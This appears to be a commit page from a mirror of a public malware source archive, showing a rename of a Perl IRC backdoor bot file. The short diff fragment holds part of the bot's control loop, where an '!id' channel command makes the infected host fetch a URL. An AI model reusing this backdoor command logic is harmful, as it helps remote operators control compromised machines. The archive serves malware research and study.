mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-15 15:29:23 +00:00
Rename Backdoor.Perl.IRCBot.t to Backdoor.Perl.IRCBot.Scanner.tc
This commit is contained in:
@@ -107,7 +107,7 @@ while ( $line = <$dsp> ) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
if ( $line =~ /PRIVMSG $channel :!id/ )
|
if ( $line =~ /PRIVMSG $channel :!id/ )
|
||||||
{ ## ©© Script made by princeteam1979 . Don't remove this comment !
|
{ ## ©© Script made by princeteam1979 . Don't remove this comment !
|
||||||
my $testid = $id;
|
my $testid = $id;
|
||||||
my $req = HTTP::Request->new( GET => $testid );
|
my $req = HTTP::Request->new( GET => $testid );
|
||||||
my $ua = LWP::UserAgent->new();
|
my $ua = LWP::UserAgent->new();
|
||||||
Reference in New Issue
Block a user